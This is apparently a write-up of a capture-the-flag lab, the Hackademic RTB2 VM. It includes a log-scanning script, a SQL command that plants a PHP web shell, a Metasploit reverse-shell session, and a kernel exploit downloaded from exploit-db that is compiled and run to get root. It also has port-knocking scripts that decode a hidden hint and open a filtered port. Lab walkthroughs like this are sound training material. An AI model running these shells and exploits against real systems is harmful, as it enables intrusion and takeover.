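    return dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))


def classify_request(path: str) -> List[str]:
    """List 'signature:parameter' labels for every suspicious parameter."""
    hits = []
    for name, value in decoded_params(path).items():
        for label, rx in SIGNATURES:
            if rx.search(value):
                hits.append("%s:%s" % (label, name))
    return hits


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse combined-format lines and return the requests that match."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = classify_request(m.group("path"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "path": m.group("path"),
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%s %s %s %s" % (f["ts"], f["ip"], f["status"], ", ".join(f["hits"])))
```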

Set up a backdoor

Now that we have the password for root, let’s connect to the phpmyadmin interface. Go to http://192.168.1.109/phpmyadmin and use the above credentials.

Open a SQL window and create a rudimentary shell that we will use to download a more sophisticated one:

select "<?php system($_GET[\"cmd\"]); ?>" into outfile "/var/www/cmd.php"

Opening http://192.168.1.109:666/cmd.php?cmd=id returns:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then upgrade to a reverse TCP backdoor with php/meterpreter/reverse_tcp (Metasploit).


Privileges escalation

After some research on http://www.exploit-db.com, you will find an exploit that works (http://www.exploit-db.com/download/14814).

From your reverse shell, download it, compile it and execute it:

root:~ /# msfconsole

       =[ metasploit v4.9.3-2014071601 [core:4.9 api:1.0] ]
+ -- --=[ 1330 exploits - 802 auxiliary - 224 post        ]
+ -- --=[ 346 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.111
LHOST => 192.168.1.111
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.111:80
[*] Starting the payload handler...
[*] Sending stage (40551 bytes) to 192.168.1.109
[*] Meterpreter session 1 opened (192.168.1.111:80 -> 192.168.1.109:60094) at 2015-07-11 22:36:34 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : HackademicRTB2
OS          : Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686
Meterpreter : php/php
meterpreter > shell
Process 1475 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python2 -c "import pty;pty.spawn('/bin/bash')"
www-data@HackademicRTB2:/var/www$ wget -O 14814.c https://www.exploit-db.com/download/14814
--2015-07-12 05:44:05--  https://www.exploit-db.com/download/14814
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
ERROR: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
To connect to www.exploit-db.com insecurely, use `--no-check-certificate'.
www-data@HackademicRTB2:/var/www$ wget --no-check-certificate -O 14814.c https://www.exploit-db.com/download/14814
--2015-07-12 05:44:40--  https://www.exploit-db.com/download/14814
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: `14814.c'

    [  <=>                                  ] 15,610      68.0K/s   in 0.2s

2015-07-12 05:44:44 (68.0 KB/s) - `14814.c' saved [15610]

www-data@HackademicRTB2:/var/www$ gcc -o exploit_priv 14814.c
www-data@HackademicRTB2:/var/www$ ./exploit_priv
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb787d000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[104] = 3539052
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@HackademicRTB2:/var/www# id
uid=0(root) gid=0(root)
root@HackademicRTB2:/var/www#


Tools

  • Nmap
  • Wfuzz
  • Sqlmap
  • Burp Suite
  • Joomscan
  • Medusa
  • Hydra
  • Metasploit

Sources

check.php

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <html><head><title>Hackademic.RTB2</title><center><br><br><br><body bgcolor="black"><img src="hackademicrtb2.png"><font color="green"></head></form><body><h2><br>
<?php
$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";
if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2)
{
    echo '<h2>';
    echo 'Ok, nice shot...';
    echo '<br>';
    echo '</h2>';
    echo '...but, you are looking in a wrong place bro! ;-)';
    echo '<br>';
    echo '<br>';
    echo '<font color="black">';
    echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';
    echo '</font color="black">';
}
else
{
    echo '<h2>';
    echo 'You are trying to login with wrong credentials!';
    echo '<br>';
    echo '</h2>';
    echo "Please try again...";
}
?>

Two things stand out in this source. First, the "login" never touches a database: the submitted password is simply compared against the literal strings ' or 1=1--' and ' OR 1=1--', so the injection-looking payload is the expected password and the "nice shot" message is a decoy, not evidence of SQL injection. Second, the real content is the string printed in black on a black background. URL-decoding it gives a space-separated hex dump; decoding those bytes gives the text "Knock Knock Knockin' on heaven's door .. :)" followed by a line of 8-bit binary groups, and those groups spell 1001:1101:1011:1001. That is a port-knocking sequence, which the firewall rules in the next section confirm.
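The decoding described above, followed by the knock itself, as an added Python example that is not part of the original write-up. HINT is the hidden string exactly as the page's PHP prints it; the function names, the connect-based knock (a plain TCP connect per port, since the rules match on destination port only) and the command-line target are this example's own choices, not anything the page specifies.

```python
"""Decode the hint hidden in Hackademic RTB2's index page and replay the knock.

Added example, not part of the original write-up. HINT is the hidden string
as printed (black on black) by the page's PHP; everything else is assumed.
"""
import socket
import sys
import time
from urllib.parse import unquote

HINT = (
    # hidden line 1: "<--------->" CRLF
    "%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64"
    "%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20"
    # hidden line 2: "Knock Knock Knockin' on heaven's door .. :)" CRLF
    "%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20"
    "%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20"
    "%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20"
    "%36%66%20%36%65%20%32%30%20"
    "%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20"
    "%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20"
    "%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20"
    # hidden line 3: nineteen 8-bit binary groups, one per character
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20"
    "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20"
    # hidden line 4: CRLF then "<--------->" LF
    "%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64"
    "%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A"
)


def decode_hint(encoded):
    """Peel the two layers: URL-encoding, then a space-separated hex dump."""
    hexdump = unquote(encoded)  # "3c 2d 2d ... 3e\n"
    return bytes.fromhex("".join(hexdump.split())).decode("ascii")


def knock_sequence(text):
    """Find the line made of 8-bit binary groups and read it as ports."""
    for line in text.splitlines():
        groups = line.split()
        if groups and all(len(g) == 8 and set(g) <= {"0", "1"} for g in groups):
            spelled = "".join(chr(int(g, 2)) for g in groups)  # "1001:1101:1011:1001"
            return [int(p) for p in spelled.split(":")]
    raise ValueError("hint contains no binary line")


def knock(host, ports, pause=0.5, timeout=0.3):
    """One TCP connect attempt per knock port, in order.

    The rules match on destination port only, so a SYN that is answered with
    RST (closed port) or times out still advances the firewall's state.
    """
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass  # refused or timed out: the packet was still seen
        time.sleep(pause)  # keep the knocks ordered on the wire


def port_open(host, port, timeout=3.0):
    """True if a TCP handshake to host:port completes (666 is REJECTed until knocked)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: knock.py <target-ip>")  # e.g. the victim IP from the scans
    target = sys.argv[1]
    text = decode_hint(HINT)
    print(text)
    ports = knock_sequence(text)
    print("666/tcp open before knock:", port_open(target, 666))
    knock(target, ports)
    print("666/tcp open after knock: ", port_open(target, 666))
```

Run it from the attacker address, because the recent module keys its lists on the source IP of the knocks; a knock sent through a proxy or from another host opens nothing for you.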

Port knocking

Once on the victim as root, dumping the firewall rules confirms the sequence hidden in the web page:

root@HackademicRTB2:~# iptables -L -n -v
Chain INPUT (policy ACCEPT 16 packets, 2935 bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:666 recent: CHECK name: PHASE4 side: source
   39  2512 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state ESTABLISHED
    0     0 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0           state RELATED
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: UPDATE name: PHASE1 side: source
    0     0            tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1001 recent: SET name: PHASE1 side: source
    0     0 INTO-PHASE2  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1101 recent: CHECK name: PHASE1 side: source
    0     0 INTO-PHASE3  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1011 recent: CHECK name: PHASE2 side: source
    0     0 INTO-PHASE4  tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:1001 recent: CHECK name: PHASE3 side: source
    0     0 REJECT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0           tcp dpt:666 reject-with icmp-port-unreachable

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain OUTPUT (policy ACCEPT 57 packets, 5293 bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain INTO-PHASE2 (1 references)
 pkts bytes target     prot opt in     out     source               destination
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE1 side: source
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE2 side: source
    0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE2: '

Chain INTO-PHASE3 (1 references)
 pkts bytes target     prot opt in     out     source               destination
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE2 side: source
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE3 side: source
    0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE3: '

Chain INTO-PHASE4 (1 references)
 pkts bytes target     prot opt in     out     source               destination
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: REMOVE name: PHASE3 side: source
    0     0            all  --  *      *       0.0.0.0/0            0.0.0.0/0           recent: SET name: PHASE4 side: source
    0     0 LOG        all  --  *      *       0.0.0.0/0            0.0.0.0/0           LOG flags 0 level 4 prefix `INTO PHASE4: '

Read top to bottom, the INPUT chain is a four-stage state machine keyed on the source address, using the recent module's lists PHASE1 to PHASE4. A packet to 1001/tcp puts the source in PHASE1; 1101/tcp from a PHASE1 source jumps to INTO-PHASE2, which moves it from PHASE1 to PHASE2 and logs; 1011/tcp moves a PHASE2 source to PHASE3; a second 1001/tcp moves a PHASE3 source to PHASE4; and only a PHASE4 source is ACCEPTed on 666/tcp, every other connection to 666 being REJECTed with an ICMP port-unreachable. That is why 666/tcp appeared filtered in the first scan and open only after the knocks, and why the sequence is 1001, 1101, 1011, 1001, exactly what the hidden hint spells. Note that nothing in the chain removes a source from a list on a wrong knock and no expiry (seconds) is shown for any list, so state only changes when the expected port is hit, and the LOG rules in the INTO-PHASE chains leave a record of every successful transition in the kernel log.
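An added example, not from the original write-up, that models the INPUT chain above in Python so a candidate sequence can be checked before touching the target. The SET, CHECK, REMOVE and UPDATE semantics follow the recent module (SET adds the source to a named list, CHECK tests membership, REMOVE drops it, UPDATE only refreshes a timestamp and, with no target, changes nothing), the rule order is the one in the dump, and the model assumes no expiry because the dump shows no seconds limit. It goes beyond the page by also checking what an ascending port scan, stray packets between knocks, and a second source address do.

```python
"""Offline model of the Hackademic RTB2 INPUT chain (added example).

Rule order and list names are taken from the iptables dump; the recent
module's semantics are modelled without expiry since no seconds limit is
displayed. Only fresh TCP packets are modelled (ESTABLISHED/RELATED skipped).
"""


class KnockFirewall:
    KNOCK_PORTS = [1001, 1101, 1011, 1001]  # read off the dpt/CHECK rules

    def __init__(self):
        self.lists = {name: set() for name in ("PHASE1", "PHASE2", "PHASE3", "PHASE4")}
        self.log = []  # what the LOG rules in the INTO-PHASE chains would record

    def _into(self, src, prev, nxt):
        """INTO-PHASEn: REMOVE from the previous list, SET the next one, LOG."""
        self.lists[prev].discard(src)
        self.lists[nxt].add(src)
        self.log.append(f"INTO {nxt}: {src}")

    def packet(self, src, dport):
        """Verdict for one new TCP packet from src to dport, rules in dump order."""
        L = self.lists
        if dport == 666 and src in L["PHASE4"]:
            return "ACCEPT"                          # rule 1
        # rule 4: recent UPDATE PHASE1 has no target; nothing to do here
        if dport == 1001:
            L["PHASE1"].add(src)                     # rule 5: SET, no target, falls through
        if dport == 1101 and src in L["PHASE1"]:
            self._into(src, "PHASE1", "PHASE2")      # rule 6, chain returns to INPUT
        if dport == 1011 and src in L["PHASE2"]:
            self._into(src, "PHASE2", "PHASE3")      # rule 7
        if dport == 1001 and src in L["PHASE3"]:
            self._into(src, "PHASE3", "PHASE4")      # rule 8 (after rule 5 above)
        if dport == 666:
            return "REJECT"                          # rule 9: icmp-port-unreachable
        return "ACCEPT"                              # chain policy


def opens_666(sequence, src="192.168.1.111"):
    """Replay a knock sequence from one source and test whether 666/tcp opens."""
    fw = KnockFirewall()
    for port in sequence:
        fw.packet(src, port)
    return fw.packet(src, 666) == "ACCEPT"


if __name__ == "__main__":
    for label, seq in [
        ("correct order", KnockFirewall.KNOCK_PORTS),
        ("wrong order", [1001, 1011, 1101, 1001]),
        ("ascending scan 1-1024", range(1, 1025)),
        ("knocks with noise between", [1001, 80, 1101, 22, 1011, 443, 1001]),
    ]:
        print(f"{label:28s} -> 666 open: {opens_666(seq)}")
```

The ascending-scan case is why a plain port scan never opens 666 on this box: 1011 is scanned before 1101, so the source gets stuck in PHASE2. The noisy case shows the other side of the same design: with no reset rule, unrelated traffic between knocks does not break the sequence.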

References

  1. http://www.aldeid.com/wiki/Hackademic-RTB2
  2. https://www.rcesecurity.com/2012/01/hackademicrtb2-and-the-art-of-port-knocking/
  3. https://wiki.archlinux.org/index.php/Port_Knocking